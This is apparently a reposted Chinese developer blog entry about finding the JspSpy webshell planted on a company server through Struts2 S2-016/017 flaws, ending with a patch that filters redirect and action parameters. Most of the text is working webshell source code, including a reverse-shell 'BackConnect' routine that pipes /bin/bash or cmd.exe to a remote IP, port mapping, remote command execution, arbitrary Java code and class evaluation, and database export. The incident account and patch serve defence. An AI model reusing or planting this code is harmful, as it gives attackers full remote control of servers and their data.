new DataInputStream(soc.getInputStream());localOut =
new DataOutputStream(soc.getOutputStream());StreamConnector.readFromLocal(localIn,remoteOut);StreamConnector.readFromRemote(soc, remoteSoc,remoteIn, localOut);} catch (Exception ex) { break ;}}}}).start();JSession.setAttribute( "done", "Map Port Success!"
);JSession.setAttribute( "localIP"
, localIP);JSession.setAttribute( "localPort"
, localPort);JSession.setAttribute( "remoteIP"
, remoteIP);JSession.setAttribute( "remotePort"
, remotePort);JSession.setAttribute(SESSION_O, "vmp"
);response.sendRedirect(SHELL_NAME);} catch (Exception e) { throw e;}}} // VBackConnect private static class VbcInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();Object ip = JSession.getAttribute("ip"
);Object port = JSession.getAttribute("port"
);Object program = JSession.getAttribute("program"
);Object done = JSession.getAttribute("done"
);JSession.removeAttribute( "ip"
);JSession.removeAttribute( "port"
);JSession.removeAttribute( "program"
);JSession.removeAttribute( "done"
); if (Util.isEmpty(ip))ip =
request.getRemoteAddr(); if (Util.isEmpty(port) || !
Util.isInteger(port.toString()))port = "1234"
; if (Util.isEmpty(program)) { if (ISLINUX)program = "/bin/bash"
; else program = "cmd.exe"
;} if (!
Util.isEmpty(done))Util.outMsg(out, done.toString());out.println( "
"
);} catch (Exception e) { throw e;}}} private static class BackConnectInvoker
extends DefaultInvoker { public boolean doAfter() { return false ;} public boolean doBefore() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String ip = request.getParameter("ip"
);String port = request.getParameter("port"
);String program = request.getParameter("program"
); if (Util.isEmpty(ip) ||
Util.isEmpty(program) || !
Util.isInteger(port)) return ;Socket socket =
new Socket(ip, Integer.parseInt(port));Process process =
Runtime.getRuntime().exec(program);( new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();( new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start();( new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();JSession.setAttribute( "done", "Back Connect Success!"
);JSession.setAttribute( "ip"
, ip);JSession.setAttribute( "port"
, port);JSession.setAttribute( "program"
, program);JSession.setAttribute(SESSION_O, "vbc"
);response.sendRedirect(SHELL_NAME);} catch (Exception e) { throw e;}}} private static class JspEnvInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
"+ " "+ " System Properties >> "+ " "+ " ");Properties pro = System.getProperties();Enumeration names = pro.propertyNames(); while (names.hasMoreElements()) {String name = (String) names.nextElement();out.println( "" + Util.htmlEncode(name) + " : "+ Util.htmlEncode(pro.getProperty(name)) + ");}out.println( " System Environment >> "); /* Map envs = System.getenv();Set> entrySet = envs.entrySet();for (Map.Entry en:entrySet) {out.println(""+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+" */ out.println( " "+ "
"
);} catch (Exception e) { throw e;}}} private static class ReflectInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String c = request.getParameter("Class"
);Class cls =
null ; try { if (!
Util.isEmpty(c))cls =
Class.forName(c);} catch (ClassNotFoundException ex) {Util.outMsg(out, "
Class " + c + " Not Found ! "
);}out.println( "
"
); if (cls !=
null ) {StringBuffer sb =
new StringBuffer(); if (cls.getPackage() !=
null )sb.append( "package " +
cls.getPackage().getName() + ";\n"
);String n =
null ; if (cls.isInterface())n = ""
; // else if (cls.isEnum()) // n = "enum"; else n = "class"
;sb.append(Modifier.toString(cls.getModifiers()) + " " +
n + " " + cls.getName() + "\n"
); if (cls.getSuperclass() !=
null )sb.append( "\textends
cls.getSuperclass().getName()+ "';document.forms['refForm'].submit()\" style='color:red;'>"+ cls.getSuperclass().getName() + " \n"
); if (cls.getInterfaces() !=
null && cls.getInterfaces().length != 0
) {Class[] faces =
cls.getInterfaces();sb.append( "\t implements "
); for (
int i = 0; i < faces.length; i++
) {sb.append( "
faces[i].getName()+ "';document.forms['refForm'].submit()\" style='color:red'>"+ faces[i].getName() + " "
); if (i != faces.length - 1
) {sb.append( ","
);}}}sb.append( "{\n\t\n"
);sb.append( "\t//constructors..\n"
);Constructor[] cs =
cls.getConstructors(); for (
int i = 0; i < cs.length; i++
) {Constructor cc =
cs[i];sb.append( "\t" + cc + ";\n"
);}sb.append( "\n\t//fields\n"
);Field[] fs =
cls.getDeclaredFields(); for (
int i = 0; i < fs.length; i++
) {Field f =
fs[i];sb.append( "\t" + f.toString() + ";"
); if (Modifier.toString(f.getModifiers()).indexOf( "static") != -1
) {sb.append( "\t//value is : "
);f.setAccessible( true );Object obj = f.get(
null );sb.append( "
"); if (obj != null )sb.append(obj.toString()); else sb.append( "NULL");sb.append( " "
);}sb.append( "\n"
);}sb.append( "\n\t//methods\n"
);Method[] ms =
cls.getDeclaredMethods(); for (
int i = 0; i < ms.length; i++
) {Method m =
ms[i];sb.append( "\t" + m.toString() + ";\n"
);}sb.append( "}\n"
);String m = "
"+ Util.highLight(sb.toString()).replaceAll("\t", " ").replaceAll( "\n", " "
;Util.outMsg(out, m, "left"
);}} catch (Exception e) { throw e;}}} private static class TopInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
"+ "
"
); if (JSession.getAttribute(MSG) !=
null ) {Util.outMsg(out, JSession.getAttribute(MSG).toString());JSession.removeAttribute(MSG);} if (JSession.getAttribute(ENTER_MSG) !=
null ) {String outEntry = request.getParameter("outentry"
); if (Util.isEmpty(outEntry) || !outEntry.equals("true"
))Util.outMsg(out, JSession.getAttribute(ENTER_MSG).toString());}} catch (Exception e) { throw e;}}} private static class VOnLineShellInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( ""
);out.println( "
"+ " " + " ");out.println( "Shell OnLine » );out.println( ""+ " );out.println( " " + " " + "
"
);} catch (Exception e) { throw e;}}} private static class OnLineInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String type = request.getParameter("type"
); if (Util.isEmpty(type)) return ; if (type.toLowerCase().equals("start"
)) {String exe = request.getParameter("exe"
); if (Util.isEmpty(exe)) return ;Process pro =
Runtime.getRuntime().exec(exe);ByteArrayOutputStream outs =
new ByteArrayOutputStream();response.setContentLength( 100000000
);response.setContentType( "text/html;charset="+ System.getProperty("file.encoding"
));OnLineProcess olp =
new OnLineProcess(pro);JSession.setAttribute(SHELL_ONLINE, olp); new OnLineConnector(
new ByteArrayInputStream(outs.toByteArray()), pro.getOutputStream(), "exeOclientR"
, olp).start(); new OnLineConnector(pro.getInputStream(), response.getOutputStream(), "exeRclientO"
, olp).start(); new OnLineConnector(pro.getErrorStream(), response.getOutputStream(), "exeRclientO"
, olp).start();Thread.sleep( 1000 * 60 * 60 * 24
);} else if (type.equals("ecmd"
)) {Object o =
JSession.getAttribute(SHELL_ONLINE);String cmd = request.getParameter("cmd"
); if (Util.isEmpty(cmd)) return ; if (o ==
null ) return ;OnLineProcess olp =
(OnLineProcess) o;olp.setCmd(cmd);} else {Object o =
JSession.getAttribute(SHELL_ONLINE); if (o ==
null ) return ;OnLineProcess olp =
(OnLineProcess) o;olp.stop();}} catch (Exception e) { throw e;}}} private static class EnterInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {PrintWriter out =
response.getWriter();String type = request.getParameter("type"
); if (!
Util.isEmpty(type)) {JSession.removeAttribute(ENTER);JSession.removeAttribute(ENTER_MSG);JSession.removeAttribute(ENTER_CURRENT_DIR);JSession.setAttribute(MSG, "Exit File Success ! "
);} else {String f = request.getParameter("filepath"
); if (Util.isEmpty(f)) return ;JSession.setAttribute(ENTER, f);JSession.setAttribute(ENTER_MSG, "You Are In File
\""+ f + "\" Now !
Exit "
);}response.sendRedirect(SHELL_NAME);}} private static class VExport2FileInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {PrintWriter out =
response.getWriter();String type = request.getParameter("type"
);String sql = request.getParameter("sql"
);String table = request.getParameter("table"
); if (Util.isEmpty(sql) &&
Util.isEmpty(table)) {JSession.setAttribute(SESSION_O, "vConn"
);response.sendRedirect(SHELL_NAME); return ;}out.println( "
"
);}} private static class ExportInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {String type = request.getParameter("type"
);String filepath = request.getParameter("filepath"
);String encode = request.getParameter("encode"
);String sql =
null ;DBOperator dbo =
null ;dbo =
(DBOperator) JSession.getAttribute(DBO); if (Util.isEmpty(type)) { // table export String tb = request.getParameter("table"
); if (Util.isEmpty(tb)) return ;String s =
dbo.getConn().getMetaData().getIdentifierQuoteString();sql = "select * from " + s + tb +
s;} else if (type.equals("queryexp"
)) { // query export sql = request.getParameter("sql"
); if (Util.isEmpty(sql)) {JSession.setAttribute(SESSION_O, "vConn"
);response.sendRedirect(SHELL_NAME); return ;}}Object o =
dbo.execute(sql);ByteArrayOutputStream bout =
new ByteArrayOutputStream(); byte [] rowSep = "\r\n"
.getBytes(); if (o
instanceof ResultSet) {ResultSet rs =
(ResultSet) o;ResultSetMetaData meta =
rs.getMetaData(); int count =
meta.getColumnCount(); for (
int i = 1; i <= count; i++
) {String colName = meta.getColumnName(i) + "\t"
; byte [] b =
null ; if (Util.isEmpty(encode))b =
colName.getBytes(); else b =
colName.getBytes(encode);bout.write(b, 0
, b.length);}bout.write(rowSep, 0
, rowSep.length); while (rs.next()) { for (
int i = 1; i <= count; i++
) {String v =
null ; try {v =
rs.getString(i);} catch (SQLException ex) {v = "<
>";}v += "\t"; byte [] b = null ; if (Util.isEmpty(encode))b = v.getBytes(); else b = v.getBytes(encode);bout.write(b, 0, b.length);}bout.write(rowSep, 0, rowSep.length);}rs.close();ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray());BufferedOutputStream output = null ; if (!Util.isEmpty(filepath)) { // export2file output = new BufferedOutputStream(new FileOutputStream( new File(filepath)));} else { // download. response.setHeader("Content-Disposition", "attachment;filename=DataExport.txt");output = new BufferedOutputStream(response.getOutputStream());} byte [] data = new byte [1024]; int len = input.read(data); while (len != -1) {output.write(data, 0, len);len = input.read(data);}bout.close();input.close();output.close(); if (!Util.isEmpty(filepath)) {JSession.setAttribute(MSG, "Export To File Success !");response.sendRedirect(SHELL_NAME);}}}} private static class EvalInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {String type = request.getParameter("type");PrintWriter out = response.getWriter();Object msg = JSession.getAttribute(MSG); if (msg != null ) {Util.outMsg(out, (String) msg);JSession.removeAttribute(MSG);} if (Util.isEmpty(type)) {out.println( ""+ " "+ " Eval Java Code » "+ ""+ "
" + "
");} else if (type.equals("jsp")) {String jspc = request.getParameter("jspc"); if (Util.isEmpty(jspc)) return ;File f = new File(SHELL_DIR, "evaltmpninty.jsp");BufferedWriter writer = new BufferedWriter( new OutputStreamWriter(new FileOutputStream(f), "utf-8"));writer.write(jspc, 0, jspc.length());writer.flush();writer.close();out.println( " ");f.delete();}}} private static class EvalUploadInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {ByteArrayOutputStream stream = new ByteArrayOutputStream();UploadBean upload = new UploadBean();upload.setTargetOutput(stream);upload.parseRequest(request); if (stream.toByteArray().length == 2) {JSession.setAttribute(MSG, "Please Upload Your Class File ! ");((Invoker) ins.get( "ev")).invoke(request, response, JSession); return ;}SpyClassLoader loader = new SpyClassLoader(); try {Class c = loader.defineClass(null , stream.toByteArray());c.newInstance();} catch (Exception e) {}stream.close();JSession.setAttribute(MSG, "Eval Java Class Done ! ");((Invoker) ins.get( "ev")).invoke(request, response, JSession);}} private static class VOtherInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out = response.getWriter();Object msg = JSession.getAttribute(MSG); if (msg != null ) {Util.outMsg(out, (String) msg);JSession.removeAttribute(MSG);}out.println( ""+ " "+ " Session Manager>> ");Enumeration en = JSession.getAttributeNames(); while (en.hasMoreElements()) {Object o = en.nextElement(); if (o.toString().equals(MSG)) continue ;out.println( ");}out.println( " " + "
");} catch (Exception e) { throw e;}}} // Session Manager private static class SmInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String type = request.getParameter("type");PrintWriter out = response.getWriter(); if (type.equals("update")) {String name = request.getParameter("name");String value = request.getParameter("value");JSession.setAttribute(name, value);JSession.setAttribute(MSG, "Update/Add Attribute Success !");} else if (type.equals("delete")) {String name = request.getParameter("name");JSession.removeAttribute(name);JSession.setAttribute(MSG, "Remove Attribute Success !");}((Invoker) ins.get( "vother")).invoke(request, response,JSession);} catch (Exception e) { throw e;}}} static {ins.put( "script", new ScriptInvoker());ins.put( "before", new BeforeInvoker());ins.put( "after", new AfterInvoker());ins.put( "deleteBatch", new DeleteBatchInvoker());ins.put( "clipboard", new ClipBoardInvoker());ins.put( "vPortScan", new VPortScanInvoker());ins.put( "portScan", new PortScanInvoker());ins.put( "vConn", new VConnInvoker());ins.put( "dbc", new DbcInvoker());ins.put( "executesql", new ExecuteSQLInvoker());ins.put( "vLogin", new VLoginInvoker());ins.put( "login", new LoginInvoker());ins.put( "filelist", new FileListInvoker());ins.put( "logout", new LogoutInvoker());ins.put( "upload", new UploadInvoker());ins.put( "copy", new CopyInvoker());ins.put( "bottom", new BottomInvoker());ins.put( "vCreateFile", new VCreateFileInvoker());ins.put( "vEdit", new VEditInvoker());ins.put( "createFile", new CreateFileInvoker());ins.put( "vEditProperty", new VEditPropertyInvoker());ins.put( "editProperty", new EditPropertyInvoker());ins.put( "vs", new VsInvoker());ins.put( "shell", new ShellInvoker());ins.put( "down", new DownInvoker());ins.put( "vd", new VdInvoker());ins.put( "downRemote", new DownRemoteInvoker());ins.put( "index", new IndexInvoker());ins.put( "mkdir", new MkDirInvoker());ins.put( "move", new MoveInvoker());ins.put( "removedir", new RemoveDirInvoker());ins.put( "packBatch", new PackBatchInvoker());ins.put( "pack", new PackInvoker());ins.put( "unpack", new UnPackInvoker());ins.put( "vmp", new VmpInvoker());ins.put( "vbc", new VbcInvoker());ins.put( "backConnect", new BackConnectInvoker());ins.put( "jspEnv", new JspEnvInvoker());ins.put( "smp", new SmpInvoker());ins.put( "mapPort", new MapPortInvoker());ins.put( "top", new TopInvoker());ins.put( "vso", new VOnLineShellInvoker());ins.put( "online", new OnLineInvoker());ins.put( "enter", new EnterInvoker());ins.put( "export", new ExportInvoker());ins.put( "ev", new EvalInvoker());ins.put( "eu", new EvalUploadInvoker());ins.put( "vother", new VOtherInvoker());ins.put( "sm", new SmInvoker());ins.put( "vExport", new VExport2FileInvoker());ins.put( "vPack", new VPackConfigInvoker());ins.put( "reflect", new ReflectInvoker());ins.put( "portBack", new PortBackInvoker());} %>
<%try {String o = request.getParameter("o"); if (Util.isEmpty(o)) { if (session.getAttribute(SESSION_O) == null )o = "index"; else {o = session.getAttribute(SESSION_O).toString();session.removeAttribute(SESSION_O);}}Object obj = ins.get(o); if (obj == null ) {response.sendRedirect(SHELL_NAME);} else {Invoker in = (Invoker) obj; if (in.doBefore()) {String path = request.getParameter("folder"); if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null )session.setAttribute(CURRENT_DIR, path);((Invoker) ins.get( "before")).invoke(request, response,session);((Invoker) ins.get( "script")).invoke(request, response,session);((Invoker) ins.get( "top")).invoke(request, response,session);}in.invoke(request, response, session); if (!in.doAfter()) { return ;} else {((Invoker) ins.get( "bottom")).invoke(request, response,session);((Invoker) ins.get( "after")).invoke(request, response,session);}}} catch (Exception e) {Object msg = session.getAttribute(MSG); if (msg != null ) {Util.outMsg(out, (String) msg);session.removeAttribute(MSG);} if (e.toString().indexOf("ClassCastException") != -1) {Util.outMsg(out, MODIFIED_ERROR + BACK_HREF);}ByteArrayOutputStream bout = new ByteArrayOutputStream();e.printStackTrace( new PrintStream(bout));session.setAttribute(CURRENT_DIR, SHELL_DIR);Util.outMsg(out, Util.htmlEncode( new String(bout.toByteArray())).replaceAll( "\n", ");bout.close();out.flush();((Invoker) ins.get( "bottom")).invoke(request, response, session);((Invoker) ins.get( "after")).invoke(request, response, session);}
%> View Code 搜索了下关键字JspSpy,找到利用structs2的016 017漏洞能上传文件到服务器。
找了2个利用漏洞的软件进行测试,经过简单的几部操作把文件上传到我们的平台目录下,这...么...简单。以前听说过structs2的漏洞,后来又把.jquery.jsp放上去登录了下,里面有文件操作,数据库操作。看完后,我马上删除了,心里真是谢谢这位上传文件的‘仁兄’,没对我们数据库动手。脑海跑过一万只草泥马。
修复
经总结有3种常用方案。
1、通过修改struts2源码修复
2、升级struts2(容易遇到兼容性问题)
3、重写struts2 DefaultActionMapper的handleSpecialParameters方法,增加action、redirect、redirectAction等参数的过滤。此方法可修补漏洞。
我先选了【2、升级struts2】,可怜我替换了半天的jar包。最后终于编译通过了,运行没问题,晚上10点开始更新代码(为什么10点更新,用户这个时候较少)。- -!听说有热部署,不知道能不能解决我们这种原始的更新部署存在的一些问题,有时间了再学习学习,继续正题。代码更新好,运行测试软件,还是有016 017漏洞。
时间已经10点多了,问题还是要解决的,想想我用软件测试漏洞上传webshell的过程如此so easy,不行必须要解决掉。不能留后患。
发现了第三种解决方法
操作步骤:
package com.website.struts2;import java.util.*;import javax.servlet.http.HttpServletRequest;import org.apache.struts2.dispatcher.mapper.ActionMapping;
import org.apache.struts2.dispatcher.mapper.DefaultActionMapper;
import org.apache.struts2.dispatcher.mapper.ParameterAction;public class MyDefaultActionMapper extends DefaultActionMapper {public void handleSpecialParameters(HttpServletRequest request, ActionMapping mapping) {Set uniqueParameters = new HashSet();Map parameterMap = request.getParameterMap();for (Iterator iterator = parameterMap.keySet().iterator(); iterator.hasNext();) {String key = (String) iterator.next();if ((key.endsWith(".x")) || (key.endsWith(".y"))) {key = key.substring(0, key.length() - 2);}// -- jason.zhou 20130708 add start -- //if ((key.contains("redirect:")) || (key.contains("redirectAction:")) || (key.contains("action:"))) {return;}// -- jason.zhou 20130708 add end -- //if (!uniqueParameters.contains(key)) {ParameterAction parameterAction = (ParameterAction) this.prefixTrie.get(key);if (parameterAction != null) {parameterAction.execute(key, mapping);uniqueParameters.add(key);break;}}}}
} 2 用struts.xml添加如下代码:
上传再测试,ok。
想到这个问题的严重性,决定记录下来。好了不多说了已经0点了。收拾收拾回家。
转载于:https://www.cnblogs.com/july4/p/5327457.html
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】 进行投诉反馈!
